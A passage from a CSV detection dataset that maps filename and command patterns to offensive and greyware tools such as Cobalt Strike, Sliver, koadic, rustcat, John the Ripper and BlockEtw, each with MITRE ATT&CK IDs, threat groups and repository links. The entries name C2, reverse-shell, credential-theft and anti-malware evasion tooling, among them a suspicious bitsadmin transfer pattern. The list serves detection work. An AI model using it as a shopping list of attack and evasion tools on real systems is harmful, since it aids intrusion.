- T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" +"*Bin\bin32\zlibwapi.dll*","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","347","56","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" +"*Bin\bin64\zlibwapi.dll*","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","347","56","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" +"*bin\SillyRAT*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" +"*bin\void.zip*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" +"*binderlabs/DirCreate2System*","offensive_tool_keyword","DirCreate2System","Weaponizing to get NT SYSTEM for Privileged Directory Creation Bugs with Windows Error Reporting","T1068 - T1059.001 - T1070.004","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/binderlabs/DirCreate2System","1","1","N/A","8","4","332","38","2022-12-19T17:00:43Z","2022-12-15T03:49:55Z" +"*binwalk -e image.png*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*binwalk*","greyware_tool_keyword","binwalk","Binwalk is a fast. easy to use tool for analyzing. reverse engineering. and extracting firmware images.","T1059.007 - T1060 - T1057 - T1142 - T1102.003","TA0002 - TA0005 - TA0009","N/A","N/A","Exploitation Tools","https://github.com/ReFirmLabs/binwalk","1","0","greyware tool - risks of False positive !","N/A","10","9643","1442","2023-08-23T23:11:31Z","2013-11-15T20:45:40Z" +"*BishopFox/sliver*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*bitb_server/phishing.ini*","offensive_tool_keyword","bitb","Browser templates for Browser In The Browser (BITB) attack","T1056.001 - T1134 - T1090","TA0005 - TA0006 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/mrd0x/BITB","1","1","N/A","10","10","2646","464","2023-07-11T04:57:46Z","2022-03-15T16:51:39Z" +"*bitcoin2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*Bitmap-Elevate*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-MS16135.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*bitquark_top100k_sublist.txt*","offensive_tool_keyword","AttackSurfaceMapper","AttackSurfaceMapper (ASM) is a reconnaissance tool that uses a mixture of open source intelligence and active techniques to expand the attack surface of your target","T1595 - T1596","TA0043","N/A","N/A","Reconnaissance","https://github.com/superhedgy/AttackSurfaceMapper","1","0","N/A","6","10","1221","192","2023-09-11T05:26:53Z","2019-08-07T14:32:53Z" +"*bits_ntlm_token_impersonation.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*bitsadmin /transfer debjob /download /priority normal \*\C$\Windows\*.dll","greyware_tool_keyword","bitsadmin","bitsadmin suspicious transfer","T1105 - T1041 - T1048","TA0002 - TA0003 - TA0010","N/A","N/A","Exploitation Tools","N/A","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*bitsadmin/nopowershell*","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","762","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" +"*BitsadminStager*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*bitshares2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*bitwarden2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*Biu-framework*","offensive_tool_keyword","Biu-framework","Biu-framework Security Scan Framework For Enterprise Intranet Based Services","T1590 - T1591 - T1592 - T1593 - T1595 - T1596 - T1599","TA0011","N/A","N/A","Frameworks","https://awesomeopensource.com/project/0xbug/Biu-framework","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*BKDR_JSPSHELL.*","signature_keyword","Antivirus Signature","Antiviurs signature_keyword","N/A","N/A","N/A","N/A","Exploitation tools","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*bkerberos_ccache_use*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*bkerberos_ticket_purge*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*bkerberos_ticket_use*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*bkeylogger*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" +"*bkkgdjpomdnfemhhkalfkogckjdkcjkg*","greyware_tool_keyword","VPNMatic","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*bks2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*blackarch/tree/master/packages/rustcat*","offensive_tool_keyword","rustcat","Rustcat(rcat) - The modern Port listener and Reverse shell","T1090.001 - T1090.002 - T1046","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/robiot/rustcat","1","1","N/A","10","10","574","56","2023-10-02T11:32:12Z","2021-06-04T17:03:47Z" +"*blackarrowsec/mssqlproxy*","offensive_tool_keyword","mssqlproxy","mssqlproxy is a toolkit aimed to perform lateral movement in restricted environments through a compromised Microsoft SQL Server via socket reuse","T1021.002 - T1071.001 - T1573.002","TA0008 - TA0011","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/blackarrowsec/mssqlproxy","1","1","N/A","10","7","682","113","2021-02-16T20:13:04Z","2020-02-12T08:44:28Z" +"*blackarrowsec/pivotnacci*","offensive_tool_keyword","pivotnacci","A tool to make socks connections through HTTP agents","T1090 - T1090.003","TA0003 - TA0011","N/A","N/A","C2 - Persistence","https://github.com/blackarrowsec/pivotnacci","1","1","N/A","9","10","614","111","2021-03-30T14:37:25Z","2020-04-28T11:36:45Z" +"*blackhat-arsenal-tools*","offensive_tool_keyword","Github Username","This github account maps to the Black Hat Arsenal tools since its inception in 2011. For readibility. the tools are classified by category and not by session.","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/toolswatch/blackhat-arsenal-tools","1","0","N/A","N/A","10","3547","1140","2023-08-14T03:46:11Z","2017-07-21T08:03:44Z" +"*blacklanternsecurity/MANSPIDER*","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","1","N/A","8","8","773","119","2023-10-04T11:08:17Z","2020-03-18T13:27:20Z" +"*blacklanternsecurity/trevorproxy*","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","1","N/A","10","8","797","127","2023-09-15T23:01:06Z","2020-09-06T23:02:37Z" +"*blacklanternsecurity/TREVORspray*","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","1","N/A","10","8","797","127","2023-09-15T23:01:06Z","2020-09-06T23:02:37Z" +"*Blackout.exe *","offensive_tool_keyword","Blackout","kill anti-malware protected processes using BYOVD","T1055 - T1562.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/ZeroMemoryEx/Blackout","1","0","N/A","N/A","8","740","116","2023-07-21T17:35:09Z","2023-05-25T23:54:21Z" +"*ble_recon.go*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" +"*blendin/3snake*","offensive_tool_keyword","3snake","Tool for extracting information from newly spawned processes","T1003 - T1110 - T1552 - T1505","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/blendin/3snake","1","1","N/A","7","7","688","114","2022-02-14T17:42:10Z","2018-02-07T21:03:15Z" +"*blindSQLPayloads.txt*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","8","785","132","2023-10-04T14:09:48Z","2020-06-06T20:17:55Z" +"*blockchain2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*blockdlls -*","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","10","10","401","83","2023-08-17T14:46:04Z","2020-11-09T08:05:16Z" +"*blockdlls start*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*blockdlls stop*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*blocketw.bin*","offensive_tool_keyword","BlockEtw",".Net Assembly to block ETW telemetry in current process","T1055.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/Soledge/BlockEtw","1","1","N/A","10","1","73","20","2020-05-14T19:24:49Z","2020-05-14T02:40:50Z" +"*blocketw.csproj*","offensive_tool_keyword","BlockEtw",".Net Assembly to block ETW telemetry in current process","T1055.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/Soledge/BlockEtw","1","1","N/A","10","1","73","20","2020-05-14T19:24:49Z","2020-05-14T02:40:50Z" +"*blocketw.exe*","offensive_tool_keyword","BlockEtw",".Net Assembly to block ETW telemetry in current process","T1055.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/Soledge/BlockEtw","1","1","N/A","10","1","73","20","2020-05-14T19:24:49Z","2020-05-14T02:40:50Z" +"*blocketw.pdb*","offensive_tool_keyword","BlockEtw",".Net Assembly to block ETW telemetry in current process","T1055.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/Soledge/BlockEtw","1","1","N/A","10","1","73","20","2020-05-14T19:24:49Z","2020-05-14T02:40:50Z" +"*BlockEtw-master*","offensive_tool_keyword","BlockEtw",".Net Assembly to block ETW telemetry in current process","T1055.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/Soledge/BlockEtw","1","1","N/A","10","1","73","20","2020-05-14T19:24:49Z","2020-05-14T02:40:50Z" +"*BlockOpenHandle.cpp*","offensive_tool_keyword","BlockOpenHandle","Block any Process to open HANDLE to your process - only SYTEM is allowed to open handle to your process - with that you can avoid remote memory scanners","T1050.005 - T1480","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/BlockOpenHandle","1","1","N/A","9","2","149","21","2023-04-27T05:42:51Z","2023-04-27T05:40:47Z" +"*BlockOpenHandle.exe*","offensive_tool_keyword","BlockOpenHandle","Block any Process to open HANDLE to your process - only SYTEM is allowed to open handle to your process - with that you can avoid remote memory scanners","T1050.005 - T1480","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/BlockOpenHandle","1","1","N/A","9","2","149","21","2023-04-27T05:42:51Z","2023-04-27T05:40:47Z" +"*BlockOpenHandle.vcxproj*","offensive_tool_keyword","BlockOpenHandle","Block any Process to open HANDLE to your process - only SYTEM is allowed to open handle to your process - with that you can avoid remote memory scanners","T1050.005 - T1480","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/BlockOpenHandle","1","1","N/A","9","2","149","21","2023-04-27T05:42:51Z","2023-04-27T05:40:47Z" +"*BlockOpenHandle-main*","offensive_tool_keyword","BlockOpenHandle","Block any Process to open HANDLE to your process - only SYTEM is allowed to open handle to your process - with that you can avoid remote memory scanners","T1050.005 - T1480","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/BlockOpenHandle","1","1","N/A","9","2","149","21","2023-04-27T05:42:51Z","2023-04-27T05:40:47Z" +"*bloginuser*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*blogonpasswords*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*bloodhound &> /dev/null &*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation 